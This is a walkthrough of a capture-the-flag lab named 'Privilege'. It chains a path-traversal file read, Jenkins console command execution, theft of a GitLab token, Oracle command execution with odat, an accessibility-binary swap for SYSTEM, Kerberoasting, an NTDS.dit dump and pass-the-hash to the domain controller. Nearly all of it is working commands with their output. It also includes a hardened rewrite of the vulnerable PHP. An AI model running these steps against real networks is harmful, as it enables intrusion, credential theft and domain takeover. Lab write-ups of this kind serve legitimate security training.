Privilege

flag01

```text
39.99.141.81:8080 open
39.99.141.81:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.99.141.81:8080 code:403 len:548 title:None
[*] WebTitle http://39.99.141.81 code:200 len:54646 title:XR SHOP
[+] PocScan http://39.99.141.81/www.zip poc-yaml-backup-file
```

The scan turns up two web sites plus a leaked www.zip source backup. Inside the tools directory there is an arbitrary file read:

```php
<?php
$logfile = rawurldecode( $_GET['logfile'] );
// Make sure the file exists.
if ( file_exists( $logfile ) ) {
// Get the content and echo it.
$text = file_get_contents( $logfile );
echo( $text );
}
exit;
```

This is enough to read the first flag:

```text
http://ip/tools/content-log.php?logfile=../../../../../../../../../../../users/administrator/flag/flag01.txt
```
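As an added example (not code from the original page), here is a hardened rewrite of the content-log.php read above: the parameter is reduced to a bare file name under a fixed log directory and the resolved path is checked against that directory. The LOG_DIR path is assumed.

```php
<?php
// Hardened version of the content-log.php file read shown above (added example).
// The original passes a user-controlled path straight to file_get_contents(), and
// rawurldecode() decodes the value a second time (PHP already decodes $_GET), so
// encoded input could slip past any filter placed before it. Here the input is
// never treated as a path: only a plain file name inside LOG_DIR is accepted.
const LOG_DIR = '/var/www/xrshop/logs'; // assumed location of the application logs

function read_log(string $requested): ?string
{
    // Allow only a simple "<name>.log" file name: no slashes, no "..", no encoding.
    if (!preg_match('/\A[A-Za-z0-9_-]+\.log\z/', $requested)) {
        return null;
    }

    $base = realpath(LOG_DIR);
    $path = realpath(LOG_DIR . DIRECTORY_SEPARATOR . $requested);

    // realpath() resolves symlinks and returns false for missing files; require the
    // resolved path to stay strictly below the log directory (defence in depth).
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }

    $text = file_get_contents($path);
    return $text === false ? null : $text;
}

$text = read_log((string) ($_GET['logfile'] ?? ''));
if ($text === null) {
    // Same response for "invalid name", "outside LOG_DIR" and "missing file",
    // so the endpoint cannot be used to probe which paths exist.
    http_response_code(404);
    echo 'not found';
} else {
    header('Content-Type: text/plain; charset=utf-8');
    echo $text;
}
```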

flag02

The challenge hint tells us where to go next:

> Obtain the backup of the XR Shop web site's source code and try to gain arbitrary file read on the system. Also, when configuring Jenkins the administrator kept the initial administrator password; try to read that password and take over the Jenkins server. The Jenkins configuration directory is C:\ProgramData\Jenkins\.jenkins.

Using the arbitrary file read, we obtain the Jenkins initial admin password:

```text
admin/510235cf43f14e83b88a9f144199655b
```

Command execution from the Jenkins back-end:

```groovy
println "net user Chu0 whoami@666 /add".execute().text
println "net localgroup administrators Chu0 /add".execute().text
```

Add a user, RDP in, set up a proxy and scan the internal network:

```text
172.22.14.7:445 open
172.22.14.7:8080 open
172.22.14.31:1521 open
172.22.14.7:3306 open
172.22.14.46:445 open
172.22.14.31:445 open
172.22.14.11:445 open
172.22.14.46:139 open
172.22.14.31:139 open
172.22.14.11:139 open
172.22.14.7:139 open
172.22.14.46:135 open
172.22.14.31:135 open
172.22.14.11:135 open
172.22.14.7:135 open
172.22.14.46:80 open
172.22.14.16:80 open
172.22.14.7:80 open
172.22.14.16:22 open
172.22.14.16:8060 open
172.22.14.11:88 open
172.22.14.16:9094 open
[*] alive ports len is: 22
start vulscan
[*] WebTitle http://172.22.14.7:8080 code:403 len:548 title:None
[*] NetInfo
[*]172.22.14.31
[->]XR-ORACLE
[->]172.22.14.31
[*] NetInfo
[*]172.22.14.11
[->]XR-DC
[->]172.22.14.11
[*] NetBios 172.22.14.46 XIAORANG\XR-0923
[*] NetInfo
[*]172.22.14.7
[->]XR-JENKINS
[->]172.22.14.7
[*] NetInfo
[*]172.22.14.46
[->]XR-0923
[->]172.22.14.46
[*] NetBios 172.22.14.11 [+] DC:XIAORANG\XR-DC
[*] WebTitle http://172.22.14.46 code:200 len:703 title:IIS Windows Server
[*] WebTitle http://172.22.14.16:8060 code:404 len:555 title:404 Not Found
[*] NetBios 172.22.14.31 WORKGROUP\XR-ORACLE
[*] WebTitle http://172.22.14.16 code:302 len:99 title:None 跳转url: http://172.22.14.16/users/sign_in
[*] WebTitle http://172.22.14.7 code:200 len:54603 title:XR SHOP
[*] WebTitle http://172.22.14.16/users/sign_in code:200 len:34961 title:Sign in · GitLab
[+] PocScan http://172.22.14.7/www.zip poc-yaml-backup-file
```

There is a GitLab instance inside. Following the hint, we look for the corresponding token in C:/ProgramData/Jenkins/.jenkins/credentials.xml and find:

```text
{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}
```

Decrypting it with the Jenkins Secret API gives the plaintext:

```groovy
println(hudson.util.Secret.fromString("{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}").getPlainText())
```

```text
glpat-7kD_qLH2PiQv_ywB9hz2
```

List the projects this token can access:

```shell
curl --header "PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2" "http://172.22.14.16/api/v4/projects"
```

This returns the repository URLs of the projects.


Clone the projects:

```shell
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/internal-secret.git
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xradmin.git
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/awenode.git
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xrwiki.git
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/gitlab-instance-23352f48/Monitoring.git
```

In xradmin, the file ruoyi-admin/src/main/resources/application-druid.yml contains the Oracle credentials:

```yaml
url: jdbc:oracle:thin:@172.22.14.31:1521/orcl
username: xradmin
password: fcMyE8t9E4XdsKf
```

With this account we get command execution on the database host directly:

```shell
proxychains4 odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user Chu0 whoami@666 /add'
proxychains4 odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup administrators Chu0 /add'
```

RDP in and collect the flag.

flag03

The internal-secret repository contains a set of credentials:

```text
XR-0923 | zhangshuai | wSbEajHzZs
```

Check the user's group membership:

```shell
net user zhangshuai
```

Result:

```text
本地组成员             *Remote Desktop Users *Remote Management Use
```

Since the account belongs to Remote Management Users, we can connect to the machine with evil-winrm:

```shell
proxychains4 evil-winrm -i 172.22.14.46 -u zhangshuai -p wSbEajHzZs
```

The machine name matches a domain-joined host, and RDP also works. Checking privileges shows SeRestorePrivilege:

```text
*Evil-WinRM* PS C:\Users\zhangshuai\Documents> whoami /priv

特权信息
----------------------

特权名 描述 状态
============================= ============== ======
SeRestorePrivilege 还原文件和目录 已启用
SeChangeNotifyPrivilege 绕过遍历检查 已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集 已启用
```

SeRestorePrivilege is present, so we use it to escalate. If you want the implant to call back, remember to launch it with cmd /c 123.exe.

```shell
ren utilman.exe utilman.old
ren cmd.exe utilman.exe
```

Lock the session and press Win+U to get a SYSTEM shell, which yields flag3.

flag04

Query the domain controller for users with registered SPNs:

```shell
proxychains4 impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes :1039312ceea16360a67467f2f66c0c37 -dc-ip 172.22.14.11
```

Request a service ticket (ST) for this user:

```shell
proxychains4 impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes :1039312ceea16360a67467f2f66c0c37 -dc-ip 172.22.14.11 -request-user tianjing
```

Crack the resulting hash:

```shell
hashcat -a 0 -m 13100 hash.txt ./rockyou.txt
```

Result:

```text
tianjing/DPQSXSXgh2
```

RDP does not work for this account, but since port 5985 is open on the target we can still log in with evil-winrm:

```shell
proxychains4 evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2 2> /dev/null
```

We still need to escalate privileges:

```text
*Evil-WinRM* PS C:\Users\public> whoami /priv

特权信息
----------------------

特权名 描述 状态
============================= ================ ======
SeMachineAccountPrivilege 将工作站添加到域 已启用
SeBackupPrivilege 备份文件和目录 已启用
SeRestorePrivilege 还原文件和目录 已启用
SeShutdownPrivilege 关闭系统 已启用
SeChangeNotifyPrivilege 绕过遍历检查 已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集 已启用
```

Both SeBackupPrivilege and SeRestorePrivilege are Enabled.

Create a file raj.dsh:

```text
set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:
```

Convert it to Windows line endings:

```shell
unix2dos raj.dsh
```

First create a folder in the root of C:

```shell
mkdir Chu0
```

Upload the script:

```shell
upload raj.dsh
```

Run the following commands in order:

```shell
diskshadow /s raj.dsh
robocopy /b z:\windows\ntds . ntds.dit
reg save hklm\system c:\Chu0\system
```

Download both files:

```shell
download ntds.dit
download system
```

Extract the hashes:

```shell
impacket-secretsdump -ntds ntds.dit -system system local
```

```text
Administrator:500:aad3b435b51404eeaad3b435b51404ee:70c39b547b7d8adec35ad7c09fb1d277:::
```

Pass-the-hash to the DC to get the last flag:

```shell
proxychains4 impacket-smbexec -hashes :70c39b547b7d8adec35ad7c09fb1d277 xiaorang.lab/administrator@172.22.14.11 -codec gbk
```